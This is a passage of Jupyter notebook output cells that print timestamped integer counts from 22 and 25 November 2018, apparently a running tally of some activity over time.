"['2018-11-22 15:26:14.761098', 11]\n",
"['2018-11-22 15:26:45.325196', 12]\n",
"['2018-11-22 15:27:07.852867', 13]\n",
"['2018-11-22 15:27:28.867607', 14]\n",
"['2018-11-22 15:27:45.736587', 15]\n",
"['2018-11-22 15:28:31.759763', 14]\n",
"['2018-11-22 15:28:45.425502', 13]\n",
"['2018-11-22 15:28:47.914968', 14]\n",
"['2018-11-22 15:28:51.894057', 15]\n",
"['2018-11-22 15:29:44.671225', 16]\n",
"['2018-11-22 15:30:09.675458', 15]\n",
"['2018-11-22 15:30:15.204101', 14]\n",
"['2018-11-22 15:30:22.236236', 15]\n",
"['2018-11-22 15:30:43.710377', 16]\n",
"['2018-11-22 15:31:09.832921', 15]\n",
"['2018-11-22 15:31:18.373459', 16]\n",
"['2018-11-22 15:31:26.646010', 17]\n",
"['2018-11-22 15:31:36.839093', 16]\n",
"['2018-11-22 15:32:00.773425', 17]\n",
"['2018-11-22 15:32:01.630397', 18]\n",
"['2018-11-22 15:32:04.146219', 19]\n",
"['2018-11-22 15:32:39.748042', 20]\n",
"['2018-11-22 15:32:44.529412', 21]\n",
"['2018-11-22 15:32:48.537028', 20]\n",
"['2018-11-22 15:34:01.973385', 19]\n",
"['2018-11-22 15:34:10.015033', 18]\n",
"['2018-11-22 15:34:32.797669', 19]\n",
"['2018-11-22 15:34:33.853630', 18]\n",
"['2018-11-22 15:34:38.411317', 19]\n",
"['2018-11-22 15:34:43.865881', 18]\n",
"['2018-11-22 15:34:53.884399', 17]\n",
"['2018-11-22 15:35:18.419527', 16]\n",
"['2018-11-22 15:35:29.226717', 15]\n",
"['2018-11-22 15:36:03.736439', 16]\n",
"['2018-11-22 15:36:05.816015', 17]\n",
"['2018-11-22 15:36:09.256806', 16]\n",
"['2018-11-22 15:36:20.847437', 15]\n",
"['2018-11-22 15:36:40.923514', 14]\n",
"['2018-11-22 15:36:49.286881', 13]\n",
"['2018-11-22 15:37:48.539668', 14]\n",
"['2018-11-22 15:37:50.782708', 15]\n",
"['2018-11-22 15:38:02.259781', 14]\n",
"['2018-11-22 15:38:35.879693', 13]\n",
"['2018-11-22 15:38:39.397219', 12]\n",
"['2018-11-22 15:39:05.950918', 11]\n",
"['2018-11-22 15:40:04.773753', 10]\n",
"['2018-11-22 15:40:12.604237', 11]\n",
"['2018-11-22 15:40:18.350857', 10]\n",
"['2018-11-22 15:41:52.386194', 9]\n",
"['2018-11-22 15:42:05.594342', 8]\n",
"['2018-11-22 15:42:25.853629', 7]\n",
"['2018-11-22 15:43:51.001815', 8]\n",
"['2018-11-22 15:46:09.828059', 7]\n",
"['2018-11-22 15:47:59.928284', 6]\n",
"['2018-11-22 15:56:01.987762', 2]\n",
"['2018-11-22 16:00:49.279855', 3]\n",
"['2018-11-22 16:01:17.578007', 4]\n",
"['2018-11-22 16:01:41.276749', 5]\n",
"['2018-11-22 16:02:24.627886', 4]\n",
"['2018-11-22 16:03:47.146946', 5]\n",
"['2018-11-22 16:05:02.621390', 6]\n",
"['2018-11-22 16:05:25.953219', 5]\n",
"['2018-11-22 16:08:43.829884', 6]\n",
"['2018-11-22 16:10:40.910455', 7]\n",
"['2018-11-22 16:11:24.634191', 8]\n",
"['2018-11-22 16:13:18.427746', 9]\n",
"['2018-11-22 16:14:37.872071', 10]\n",
"['2018-11-22 16:14:43.245487', 11]\n",
"['2018-11-22 16:15:00.782610', 12]\n",
"['2018-11-22 16:15:01.492962', 13]\n",
"['2018-11-22 16:15:05.626011', 14]\n",
"['2018-11-22 16:15:22.842088', 15]\n",
"['2018-11-22 16:15:35.491317', 14]\n",
"['2018-11-22 16:15:47.879352', 15]\n",
"['2018-11-22 16:16:02.408194', 16]\n",
"['2018-11-22 16:16:11.349314', 17]\n",
"['2018-11-22 16:16:21.566826', 18]\n",
"['2018-11-22 16:17:38.268971', 17]\n",
"['2018-11-22 16:17:50.796890', 18]\n",
"['2018-11-22 16:18:25.028551', 17]\n",
"['2018-11-22 16:18:42.577346', 15]\n",
"['2018-11-22 16:18:43.387686', 14]\n",
"['2018-11-22 16:18:47.925686', 15]\n",
"['2018-11-22 16:18:51.649773', 16]\n",
"['2018-11-22 16:19:19.961596', 17]\n",
"['2018-11-22 16:19:47.926235', 16]\n",
"['2018-11-22 16:19:55.673176', 17]\n",
"['2018-11-22 16:20:11.339499', 16]\n",
"['2018-11-22 16:20:17.774794', 17]\n",
"['2018-11-22 16:20:21.650028', 15]\n",
"['2018-11-22 16:20:29.816298', 13]\n",
"['2018-11-22 16:20:44.292802', 14]\n",
"['2018-11-22 16:20:52.834523', 15]\n",
"['2018-11-22 16:21:20.408352', 16]\n",
"['2018-11-22 16:21:56.929062', 15]\n",
"['2018-11-22 16:22:21.806059', 16]\n",
"['2018-11-22 16:22:48.285196', 17]\n",
"['2018-11-22 16:22:57.650524', 16]\n",
"['2018-11-22 16:23:14.623715', 17]\n",
"['2018-11-22 16:23:21.716762', 18]\n",
"['2018-11-22 16:23:52.861204', 17]\n",
"['2018-11-22 16:23:57.643317', 16]\n",
"['2018-11-22 16:23:58.719543', 15]\n",
"['2018-11-22 16:24:12.189930', 16]\n",
"['2018-11-22 16:24:17.538080', 15]\n",
"['2018-11-22 16:24:21.223063', 16]\n",
"['2018-11-22 16:24:26.222385', 15]\n",
"['2018-11-22 16:25:07.090025', 13]\n",
"['2018-11-22 16:26:28.735893', 12]\n",
"['2018-11-22 16:26:45.971177', 13]\n",
"['2018-11-22 16:27:00.357140', 12]\n",
"['2018-11-22 16:27:10.198234', 13]\n",
"['2018-11-22 16:27:13.066774', 12]\n",
"['2018-11-22 16:27:18.749792', 11]\n",
"['2018-11-22 16:27:28.118726', 10]\n",
"['2018-11-22 16:28:01.094130', 11]\n",
"['2018-11-22 16:28:13.319303', 10]\n",
"['2018-11-22 16:28:16.774386', 11]\n",
"['2018-11-22 16:28:27.946736', 12]\n",
"['2018-11-22 16:28:44.303317', 11]\n",
"['2018-11-22 16:30:30.208097', 10]\n",
"['2018-11-22 16:32:01.990894', 11]\n",
"['2018-11-22 16:32:13.014100', 10]\n",
"['2018-11-22 16:33:48.782181', 7]\n",
"['2018-11-22 16:34:35.744717', 8]\n",
"['2018-11-22 16:34:56.390735', 7]\n",
"['2018-11-22 16:35:07.549111', 8]\n",
"['2018-11-22 16:35:52.801271', 9]\n",
"['2018-11-22 16:36:15.813061', 10]\n",
"['2018-11-22 16:36:26.461970', 9]\n",
"['2018-11-22 16:38:07.997082', 8]\n",
"['2018-11-22 16:39:25.416279', 7]\n",
"['2018-11-22 16:39:35.367143', 8]\n",
"['2018-11-22 16:39:55.436828', 7]\n",
"['2018-11-22 16:40:25.486794', 6]\n",
"['2018-11-22 16:42:22.283703', 5]\n",
"['2018-11-22 16:42:42.303902', 4]\n",
"['2018-11-22 16:43:00.832406', 5]\n",
"['2018-11-22 16:52:01.579979', 4]\n",
"['2018-11-22 16:52:45.385464', 5]\n",
"['2018-11-22 16:53:36.849832', 6]\n",
"['2018-11-22 16:53:38.220243', 7]\n",
"['2018-11-22 16:53:41.830875', 8]\n",
"['2018-11-22 16:53:53.839770', 9]\n",
"['2018-11-22 16:53:55.589724', 10]\n",
"['2018-11-22 16:53:57.329638', 11]\n",
"['2018-11-22 16:54:31.236655', 12]\n",
"['2018-11-22 16:54:52.367858', 13]\n",
"['2018-11-22 16:55:40.947873', 12]\n",
"['2018-11-22 16:57:38.795658', 11]\n",
"['2018-11-22 16:58:27.081765', 12]\n",
"['2018-11-22 16:58:30.827082', 13]\n",
"['2018-11-22 16:58:47.802312', 12]\n",
"['2018-11-22 16:58:58.264418', 13]\n",
"['2018-11-22 16:59:00.482686', 14]\n",
"['2018-11-22 16:59:02.676643', 15]\n",
"['2018-11-22 16:59:07.842628', 16]\n",
"['2018-11-22 16:59:09.264601', 17]\n",
"['2018-11-22 16:59:29.947856', 16]\n",
"['2018-11-22 16:59:43.649448', 15]\n",
"['2018-11-22 17:01:34.250032', 14]\n",
"['2018-11-22 17:01:57.293299', 13]\n",
"['2018-11-22 17:02:29.771232', 12]\n",
"['2018-11-22 17:02:35.442188', 11]\n",
"['2018-11-22 17:03:17.145515', 12]\n",
"['2018-11-22 17:03:54.868539', 11]\n",
"['2018-11-22 17:05:48.459357', 12]\n",
"['2018-11-22 17:06:01.433464', 13]\n",
"['2018-11-22 17:06:32.686665', 12]\n",
"['2018-11-22 17:07:02.109027', 11]\n",
"['2018-11-22 17:07:23.598153', 10]\n",
"['2018-11-22 17:08:07.802279', 9]\n",
"['2018-11-22 17:08:46.558682', 10]\n",
"['2018-11-22 17:09:31.880191', 11]\n",
"['2018-11-22 17:12:39.097854', 12]\n",
"['2018-11-22 17:12:53.102670', 13]\n",
"['2018-11-22 17:13:07.572529', 14]\n",
"['2018-11-22 17:13:13.579384', 15]\n",
"['2018-11-22 17:13:40.980630', 16]\n",
"['2018-11-22 17:13:58.916825', 15]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 17:14:36.281878', 16]\n",
"['2018-11-22 17:14:48.746874', 15]\n",
"['2018-11-22 17:15:16.648080', 16]\n",
"['2018-11-22 17:15:34.806006', 17]\n",
"['2018-11-22 17:16:00.904503', 16]\n",
"['2018-11-22 17:16:34.822053', 15]\n",
"['2018-11-22 17:16:43.977334', 13]\n",
"['2018-11-22 17:17:14.375745', 12]\n",
"['2018-11-22 17:17:30.494042', 13]\n",
"['2018-11-22 17:18:59.321472', 12]\n",
"['2018-11-22 17:19:11.135448', 13]\n",
"['2018-11-22 17:19:16.712407', 12]\n",
"['2018-11-22 17:19:40.810594', 11]\n",
"['2018-11-22 17:19:40.886602', 12]\n",
"['2018-11-22 17:20:33.351832', 13]\n",
"['2018-11-22 17:20:53.902338', 14]\n",
"['2018-11-22 17:22:36.784659', 13]\n",
"['2018-11-22 17:22:52.118842', 14]\n",
"['2018-11-22 17:24:08.925297', 13]\n",
"['2018-11-22 17:24:19.253350', 14]\n",
"['2018-11-22 17:24:50.449659', 15]\n",
"['2018-11-22 17:24:56.602865', 16]\n",
"['2018-11-22 17:25:01.676934', 17]\n",
"['2018-11-22 17:25:16.412104', 18]\n",
"['2018-11-22 17:25:21.426983', 17]\n",
"['2018-11-22 17:25:26.295848', 18]\n",
"['2018-11-22 17:25:51.943969', 19]\n",
"['2018-11-22 17:25:56.256138', 20]\n",
"['2018-11-22 17:26:10.347573', 21]\n",
"['2018-11-22 17:26:29.944985', 22]\n",
"['2018-11-22 17:26:40.415122', 23]\n",
"['2018-11-22 17:26:43.958430', 24]\n",
"['2018-11-22 17:26:45.042760', 25]\n",
"['2018-11-22 17:26:46.263781', 26]\n",
"['2018-11-22 17:26:55.214743', 25]\n",
"['2018-11-22 17:27:15.666060', 24]\n",
"['2018-11-22 17:27:31.335997', 23]\n",
"['2018-11-22 17:27:56.955001', 24]\n",
"['2018-11-22 17:28:10.225176', 23]\n",
"['2018-11-22 17:28:17.224244', 24]\n",
"['2018-11-22 17:28:31.961184', 25]\n",
"['2018-11-22 17:28:44.556834', 24]\n",
"['2018-11-22 17:29:27.271797', 23]\n",
"['2018-11-22 17:29:33.843295', 24]\n",
"['2018-11-22 17:30:01.608093', 21]\n",
"['2018-11-22 17:30:02.584182', 20]\n",
"['2018-11-22 17:30:07.501963', 19]\n",
"['2018-11-22 17:30:16.964299', 18]\n",
"['2018-11-22 17:30:32.039400', 19]\n",
"['2018-11-22 17:30:33.792260', 20]\n",
"['2018-11-22 17:30:46.082677', 18]\n",
"['2018-11-22 17:31:00.637598', 17]\n",
"['2018-11-22 17:31:28.412951', 18]\n",
"['2018-11-22 17:31:53.343289', 19]\n",
"['2018-11-22 17:31:57.490378', 18]\n",
"['2018-11-22 17:32:00.288960', 19]\n",
"['2018-11-22 17:32:06.429722', 20]\n",
"['2018-11-22 17:32:17.285875', 21]\n",
"['2018-11-22 17:32:28.722205', 22]\n",
"['2018-11-22 17:32:36.088429', 23]\n",
"['2018-11-22 17:32:39.959122', 24]\n",
"['2018-11-22 17:32:43.091472', 25]\n",
"['2018-11-22 17:32:45.374030', 24]\n",
"['2018-11-22 17:32:46.569358', 23]\n",
"['2018-11-22 17:32:49.850999', 24]\n",
"['2018-11-22 17:32:50.219683', 25]\n",
"['2018-11-22 17:33:00.984341', 24]\n",
"['2018-11-22 17:33:04.401349', 25]\n",
"['2018-11-22 17:33:07.288248', 26]\n",
"['2018-11-22 17:33:20.290446', 25]\n",
"['2018-11-22 17:33:31.979522', 26]\n",
"['2018-11-22 17:33:35.597151', 24]\n",
"['2018-11-22 17:33:37.877768', 25]\n",
"['2018-11-22 17:33:45.112686', 26]\n",
"['2018-11-22 17:33:51.096816', 27]\n",
"['2018-11-22 17:34:06.877153', 26]\n",
"['2018-11-22 17:34:10.358510', 25]\n",
"['2018-11-22 17:34:15.140956', 26]\n",
"['2018-11-22 17:34:31.554852', 27]\n",
"['2018-11-22 17:34:40.828138', 26]\n",
"['2018-11-22 17:35:37.807464', 25]\n",
"['2018-11-22 17:36:08.441309', 24]\n",
"['2018-11-22 17:36:14.169655', 25]\n",
"['2018-11-22 17:36:27.213800', 23]\n",
"['2018-11-22 17:36:52.427404', 22]\n",
"['2018-11-22 17:37:00.668654', 23]\n",
"['2018-11-22 17:37:32.444954', 21]\n",
"['2018-11-22 17:37:42.988092', 20]\n",
"['2018-11-22 17:37:49.533385', 16]\n",
"['2018-11-22 17:37:52.467654', 15]\n",
"['2018-11-22 17:38:31.789913', 13]\n",
"['2018-11-22 17:38:49.617595', 9]\n",
"['2018-11-22 17:39:13.691087', 10]\n",
"['2018-11-22 17:40:14.898980', 9]\n",
"['2018-11-22 17:40:45.688113', 10]\n",
"['2018-11-22 17:41:03.311209', 9]\n",
"['2018-11-22 17:41:04.979222', 10]\n",
"['2018-11-22 17:41:38.142426', 11]\n",
"['2018-11-22 17:43:07.036897', 9]\n",
"['2018-11-22 17:43:19.699195', 8]\n",
"['2018-11-22 17:45:01.487710', 7]\n",
"['2018-11-22 17:45:04.739544', 6]\n",
"['2018-11-22 17:45:21.489479', 5]\n",
"['2018-11-22 17:45:55.153057', 4]\n",
"['2018-11-22 17:45:56.698643', 5]\n",
"['2018-11-22 17:48:01.627726', 6]\n",
"['2018-11-22 17:50:13.802832', 5]\n",
"['2018-11-22 17:51:39.842599', 6]\n",
"['2018-11-22 17:54:27.491735', 5]\n",
"['2018-11-22 17:55:37.010524', 3]\n",
"['2018-11-22 17:56:46.755669', 2]\n",
"['2018-11-22 17:58:36.139031', 3]\n",
"['2018-11-22 18:00:44.730560', 4]\n",
"['2018-11-22 18:00:52.738944', 3]\n",
"['2018-11-22 18:07:23.884958', 4]\n",
"['2018-11-22 18:09:04.165565', 5]\n",
"['2018-11-22 18:10:06.890786', 6]\n",
"['2018-11-22 18:10:41.135928', 7]\n",
"['2018-11-22 18:10:42.283518', 8]\n",
"['2018-11-22 18:10:54.818178', 9]\n",
"['2018-11-22 18:11:00.514396', 10]\n",
"['2018-11-22 18:11:04.649308', 11]\n",
"['2018-11-22 18:11:10.312624', 12]\n",
"['2018-11-22 18:11:37.859139', 13]\n",
"['2018-11-22 18:11:38.540360', 14]\n",
"['2018-11-22 18:11:43.234251', 15]\n",
"['2018-11-22 18:11:47.981755', 16]\n",
"['2018-11-22 18:11:48.858050', 17]\n",
"['2018-11-22 18:11:53.970611', 18]\n",
"['2018-11-22 18:12:12.972788', 19]\n",
"['2018-11-22 18:12:14.362455', 20]\n",
"['2018-11-22 18:12:29.386962', 21]\n",
"['2018-11-22 18:12:44.279755', 22]\n",
"['2018-11-22 18:13:04.921214', 21]\n",
"['2018-11-22 18:13:21.303991', 22]\n",
"['2018-11-22 18:13:24.665083', 21]\n",
"['2018-11-22 18:13:53.110425', 22]\n",
"['2018-11-22 18:14:01.694641', 23]\n",
"['2018-11-22 18:14:10.743598', 22]\n",
"['2018-11-22 18:15:48.130371', 23]\n",
"['2018-11-22 18:16:00.854871', 24]\n",
"['2018-11-22 18:16:10.123032', 23]\n",
"['2018-11-22 18:16:15.261291', 22]\n",
"['2018-11-22 18:17:47.060346', 21]\n",
"['2018-11-22 18:17:53.189155', 19]\n",
"['2018-11-22 18:17:55.147758', 18]\n",
"['2018-11-22 18:18:05.156417', 17]\n",
"['2018-11-22 18:18:15.162383', 16]\n",
"['2018-11-22 18:18:19.384061', 17]\n",
"['2018-11-22 18:18:47.952563', 15]\n",
"['2018-11-22 18:19:20.299685', 16]\n",
"['2018-11-22 18:19:28.605305', 17]\n",
"['2018-11-22 18:19:51.292391', 13]\n",
"['2018-11-22 18:19:54.460941', 14]\n",
"['2018-11-22 18:20:03.946172', 13]\n",
"['2018-11-22 18:20:21.387195', 12]\n",
"['2018-11-22 18:20:29.093670', 13]\n",
"['2018-11-22 18:20:40.352122', 14]\n",
"['2018-11-22 18:20:43.735997', 15]\n",
"['2018-11-22 18:20:54.859545', 16]\n",
"['2018-11-22 18:21:13.693987', 17]\n",
"['2018-11-22 18:21:14.423522', 18]\n",
"['2018-11-22 18:21:21.982541', 19]\n",
"['2018-11-22 18:21:29.576354', 20]\n",
"['2018-11-22 18:22:21.416002', 19]\n",
"['2018-11-22 18:22:52.405120', 18]\n",
"['2018-11-22 18:23:23.469307', 16]\n",
"['2018-11-22 18:23:23.677324', 17]\n",
"['2018-11-22 18:23:40.639147', 18]\n",
"['2018-11-22 18:23:56.983511', 19]\n",
"['2018-11-22 18:24:04.075823', 18]\n",
"['2018-11-22 18:24:34.086421', 17]\n",
"['2018-11-22 18:24:49.093796', 15]\n",
"['2018-11-22 18:25:00.812340', 14]\n",
"['2018-11-22 18:25:19.125607', 13]\n",
"['2018-11-22 18:25:27.675933', 14]\n",
"['2018-11-22 18:25:29.874939', 15]\n",
"['2018-11-22 18:25:38.266293', 16]\n",
"['2018-11-22 18:25:53.276310', 15]\n",
"['2018-11-22 18:26:34.250076', 14]\n",
"['2018-11-22 18:27:49.213279', 13]\n",
"['2018-11-22 18:27:58.836361', 12]\n",
"['2018-11-22 18:30:40.299238', 11]\n",
"['2018-11-22 18:30:42.755042', 10]\n",
"['2018-11-22 18:31:17.352729', 11]\n",
"['2018-11-22 18:31:59.801072', 10]\n",
"['2018-11-22 18:32:10.375599', 9]\n",
"['2018-11-22 18:34:42.837183', 8]\n",
"['2018-11-22 18:35:25.533486', 7]\n",
"['2018-11-22 18:36:10.557853', 6]\n",
"['2018-11-22 18:37:14.452743', 7]\n",
"['2018-11-22 18:39:45.686713', 6]\n",
"['2018-11-22 18:41:00.798261', 7]\n",
"['2018-11-22 18:42:21.835875', 6]\n",
"['2018-11-22 18:42:53.702583', 5]\n",
"['2018-11-22 18:45:29.648038', 4]\n",
"['2018-11-22 18:46:01.701784', 3]\n",
"['2018-11-22 18:49:52.641427', 4]\n",
"['2018-11-22 18:50:14.188133', 5]\n",
"['2018-11-22 18:50:43.926220', 6]\n",
"['2018-11-22 18:52:07.281068', 7]\n",
"['2018-11-22 18:52:13.431539', 8]\n",
"['2018-11-22 18:53:38.464588', 9]\n",
"['2018-11-22 18:53:47.692698', 8]\n",
"['2018-11-22 18:53:57.442108', 7]\n",
"['2018-11-22 18:55:16.711529', 6]\n",
"['2018-11-22 18:56:08.711485', 5]\n",
"['2018-11-22 18:58:44.608935', 6]\n",
"['2018-11-22 18:59:11.199613', 7]\n",
"['2018-11-22 18:59:17.199400', 8]\n",
"['2018-11-22 19:00:21.738599', 9]\n",
"['2018-11-22 19:01:09.110631', 10]\n",
"['2018-11-22 19:01:24.950780', 11]\n",
"['2018-11-22 19:02:35.027901', 10]\n",
"['2018-11-22 19:02:51.016742', 9]\n",
"['2018-11-22 19:02:59.938443', 8]\n",
"['2018-11-22 19:04:34.941095', 7]\n",
"['2018-11-22 19:08:16.499885', 8]\n",
"['2018-11-22 19:12:40.694528', 9]\n",
"['2018-11-22 19:13:58.532065', 7]\n",
"['2018-11-22 19:14:25.010452', 8]\n",
"['2018-11-22 19:14:56.507880', 9]\n",
"['2018-11-22 19:15:09.613844', 8]\n",
"['2018-11-22 19:16:41.755741', 9]\n",
"['2018-11-22 19:18:58.122554', 8]\n",
"['2018-11-22 19:20:43.425045', 7]\n",
"['2018-11-22 19:21:08.854149', 6]\n",
"['2018-11-22 19:21:18.817837', 7]\n",
"['2018-11-22 19:22:28.522269', 8]\n",
"['2018-11-22 19:22:37.453456', 7]\n",
"['2018-11-22 19:23:23.908983', 6]\n",
"['2018-11-22 19:24:29.343046', 7]\n",
"['2018-11-22 19:26:04.588922', 8]\n",
"['2018-11-22 19:28:37.898707', 9]\n",
"['2018-11-22 19:28:47.969536', 10]\n",
"['2018-11-22 19:28:48.728816', 11]\n",
"['2018-11-22 19:28:54.920755', 12]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 19:29:46.371547', 13]\n",
"['2018-11-22 19:29:58.066911', 12]\n",
"['2018-11-22 19:30:22.685317', 13]\n",
"['2018-11-22 19:30:45.064670', 14]\n",
"['2018-11-22 19:31:09.584639', 15]\n",
"['2018-11-22 19:31:21.737430', 16]\n",
"['2018-11-22 19:31:28.227680', 17]\n",
"['2018-11-22 19:31:37.861657', 18]\n",
"['2018-11-22 19:32:50.964652', 15]\n",
"['2018-11-22 19:33:01.819367', 14]\n",
"['2018-11-22 19:33:15.539778', 15]\n",
"['2018-11-22 19:34:24.335190', 16]\n",
"['2018-11-22 19:34:39.337498', 15]\n",
"['2018-11-22 19:34:49.281157', 16]\n",
"['2018-11-22 19:35:09.949366', 14]\n",
"['2018-11-22 19:35:22.006716', 13]\n",
"['2018-11-22 19:35:30.038380', 10]\n",
"['2018-11-22 19:35:39.919885', 11]\n",
"['2018-11-22 19:35:56.095916', 9]\n",
"['2018-11-22 19:36:19.936115', 8]\n",
"['2018-11-22 19:37:00.466528', 7]\n",
"['2018-11-22 19:38:58.233102', 5]\n",
"['2018-11-22 19:44:36.198930', 2]\n",
"['2018-11-22 20:11:30.311228', 3]\n",
"['2018-11-22 20:14:29.482292', 4]\n",
"['2018-11-22 20:15:32.419818', 5]\n",
"['2018-11-22 20:15:48.036882', 6]\n",
"['2018-11-22 20:15:59.115957', 7]\n",
"['2018-11-22 20:16:11.842190', 8]\n",
"['2018-11-22 20:16:18.980391', 9]\n",
"['2018-11-22 20:17:04.925697', 10]\n",
"['2018-11-22 20:18:43.617302', 11]\n",
"['2018-11-22 20:18:49.250804', 10]\n",
"['2018-11-22 20:20:01.887268', 8]\n",
"['2018-11-22 20:22:16.928889', 5]\n",
"['2018-11-22 20:23:25.379067', 3]\n",
"['2018-11-22 20:24:02.130092', 2]\n",
"['2018-11-22 20:25:41.079806', 3]\n",
"['2018-11-22 20:33:45.424210', 2]\n",
"['2018-11-22 20:35:19.863106', 3]\n",
"['2018-11-22 20:40:30.758489', 4]\n",
"['2018-11-22 20:42:59.703809', 3]\n",
"['2018-11-22 20:46:04.413127', 4]\n",
"['2018-11-22 20:46:56.860799', 5]\n",
"['2018-11-22 20:48:12.267346', 6]\n",
"['2018-11-22 20:50:12.824916', 4]\n",
"['2018-11-22 20:50:52.012266', 3]\n",
"['2018-11-22 20:57:31.039116', 2]\n",
"['2018-11-22 21:01:50.868913', 3]\n",
"['2018-11-22 21:02:50.650755', 4]\n",
"['2018-11-22 21:05:29.105635', 5]\n",
"['2018-11-22 21:05:49.573555', 6]\n",
"['2018-11-22 21:05:52.440901', 5]\n",
"['2018-11-22 21:06:38.864547', 6]\n",
"['2018-11-22 21:06:39.076432', 7]\n",
"['2018-11-22 21:06:55.850325', 8]\n",
"['2018-11-22 21:07:40.885424', 6]\n",
"['2018-11-22 21:09:31.268656', 7]\n",
"['2018-11-22 21:14:21.467218', 2]\n",
"['2018-11-22 21:14:25.675684', 3]\n",
"['2018-11-25 05:48:08.007354', 2]\n",
"['2018-11-25 05:50:05.686788', 3]\n",
"['2018-11-25 06:02:32.022005', 2]\n",
"['2018-11-25 06:04:16.480700', 3]\n",
"['2018-11-25 06:12:16.585270', 2]\n",
"['2018-11-25 06:16:00.854645', 3]\n",
"['2018-11-25 06:20:30.457831', 4]\n",
"['2018-11-25 07:21:43.355492', 2]\n",
"['2018-11-25 07:22:15.127483', 3]\n",
"['2018-11-25 07:28:51.863331', 2]\n",
"['2018-11-25 07:31:38.728957', 3]\n",
"['2018-11-25 07:32:52.622922', 4]\n",
"['2018-11-25 07:32:53.110510', 5]\n",
"['2018-11-25 07:34:15.504383', 6]\n",
"['2018-11-25 07:36:06.001620', 5]\n",
"['2018-11-25 07:38:00.478905', 4]\n",
"['2018-11-25 07:39:20.270221', 5]\n",
"['2018-11-25 07:40:29.230784', 6]\n",
"['2018-11-25 07:43:43.224835', 5]\n",
"['2018-11-25 07:45:29.809443', 6]\n",
"['2018-11-25 07:49:31.184603', 5]\n",
"['2018-11-25 07:51:05.010852', 6]\n",
"['2018-11-25 07:52:31.182782', 7]\n",
"['2018-11-25 07:54:56.952495', 8]\n",
"['2018-11-25 07:54:59.413633', 9]\n",
"['2018-11-25 07:55:20.779319', 8]\n",
"['2018-11-25 07:55:39.077836', 9]\n",
"['2018-11-25 07:55:45.055855', 8]\n",
"['2018-11-25 07:58:24.510190', 9]\n",
"['2018-11-25 07:59:11.152973', 7]\n",
"['2018-11-25 08:00:17.340533', 6]\n",
"['2018-11-25 08:00:37.629724', 7]\n",
"['2018-11-25 08:01:34.563607', 8]\n",
"['2018-11-25 08:02:11.485165', 9]\n",
"['2018-11-25 08:04:34.038261', 8]\n",
"['2018-11-25 08:04:38.995233', 7]\n",
"['2018-11-25 08:05:04.002780', 6]\n",
"['2018-11-25 08:05:24.000752', 4]\n",
"['2018-11-25 08:05:38.020568', 3]\n",
"['2018-11-25 08:18:49.061387', 2]\n",
"['2018-11-25 08:26:39.843937', 3]\n",
"['2018-11-25 08:29:22.451131', 4]\n",
"['2018-11-25 08:32:22.493155', 2]\n",
"['2018-11-25 08:33:16.789894', 3]\n",
"['2018-11-25 08:43:18.140141', 4]\n",
"['2018-11-25 08:44:22.480326', 5]\n",
"['2018-11-25 08:47:17.338177', 4]\n",
"['2018-11-25 08:49:28.594145', 5]\n",
"['2018-11-25 08:49:37.022724', 6]\n",
"['2018-11-25 08:49:41.717983', 7]\n",
"['2018-11-25 08:49:46.704170', 8]\n",
"['2018-11-25 08:49:55.612597', 9]\n",
"['2018-11-25 08:51:04.110498', 10]\n",
"['2018-11-25 08:51:54.228781', 11]\n",
"['2018-11-25 08:51:57.711201', 12]\n",
"['2018-11-25 08:52:03.074492', 13]\n",
"['2018-11-25 08:52:36.313152', 14]\n",
"['2018-11-25 08:53:55.050860', 12]\n",
"['2018-11-25 08:54:05.725979', 13]\n",
"['2018-11-25 08:54:53.799637', 12]\n",
"['2018-11-25 08:55:25.252468', 11]\n",
"['2018-11-25 08:55:47.720251', 10]\n",
"['2018-11-25 08:55:56.833355', 11]\n",
"['2018-11-25 08:55:57.991562', 10]\n",
"['2018-11-25 08:56:09.163859', 8]\n",
"['2018-11-25 08:57:40.077398', 9]\n",
"['2018-11-25 08:58:04.666613', 10]\n",
"['2018-11-25 08:58:11.340796', 9]\n",
"['2018-11-25 08:59:22.662508', 10]\n",
"['2018-11-25 09:00:04.939113', 11]\n",
"['2018-11-25 09:00:13.825617', 12]\n",
"['2018-11-25 09:01:26.290097', 11]\n",
"['2018-11-25 09:01:57.163931', 10]\n",
"['2018-11-25 09:02:31.668446', 8]\n",
"['2018-11-25 09:02:44.252840', 9]\n",
"['2018-11-25 09:03:30.988487', 8]\n",
"['2018-11-25 09:04:06.225217', 7]\n",
"['2018-11-25 09:06:11.582399', 8]\n",
"['2018-11-25 09:09:34.280089', 9]\n",
"['2018-11-25 09:10:12.055927', 8]\n",
"['2018-11-25 09:12:43.226409', 6]\n",
"['2018-11-25 09:26:08.477536', 2]\n",
"['2018-11-25 09:39:37.000823', 3]\n",
"['2018-11-25 09:40:41.160762', 4]\n",
"['2018-11-25 09:41:11.020965', 5]\n",
"['2018-11-25 09:44:10.782581', 6]\n",
"['2018-11-25 09:45:46.093484', 5]\n",
"['2018-11-25 09:46:15.958487', 6]\n",
"['2018-11-25 09:46:18.500218', 7]\n",
"['2018-11-25 09:48:00.779530', 8]\n",
"['2018-11-25 09:48:09.091718', 9]\n",
"['2018-11-25 09:48:20.952987', 8]\n",
"['2018-11-25 09:51:28.288519', 7]\n",
"['2018-11-25 09:52:04.475040', 8]\n",
"['2018-11-25 09:52:32.897410', 9]\n",
"['2018-11-25 09:52:48.199470', 10]\n",
"['2018-11-25 09:53:11.054127', 11]\n",
"['2018-11-25 09:53:21.505205', 12]\n",
"['2018-11-25 09:54:19.652629', 10]\n",
"['2018-11-25 09:55:35.654188', 9]\n",
"['2018-11-25 09:56:57.968331', 10]\n",
"['2018-11-25 09:57:52.227466', 9]\n",
"['2018-11-25 09:57:52.740498', 10]\n",
"['2018-11-25 09:57:59.510190', 11]\n",
"['2018-11-25 09:58:10.178785', 12]\n",
"['2018-11-25 09:58:11.138703', 13]\n",
"['2018-11-25 09:59:02.389135', 12]\n",
"['2018-11-25 09:59:23.972477', 11]\n",
"['2018-11-25 10:00:28.822314', 12]\n",
"['2018-11-25 10:00:45.992623', 13]\n",
"['2018-11-25 10:01:04.101956', 12]\n",
"['2018-11-25 10:02:20.421956', 11]\n",
"['2018-11-25 10:02:31.690857', 10]\n",
"['2018-11-25 10:02:52.055215', 9]\n",
"['2018-11-25 10:03:00.035658', 8]\n",
"['2018-11-25 10:03:18.513101', 9]\n",
"['2018-11-25 10:03:31.339442', 8]\n",
"['2018-11-25 10:09:05.212171', 2]\n",
"['2018-11-25 10:27:35.564085', 3]\n",
"['2018-11-25 10:37:15.757690', 2]\n",
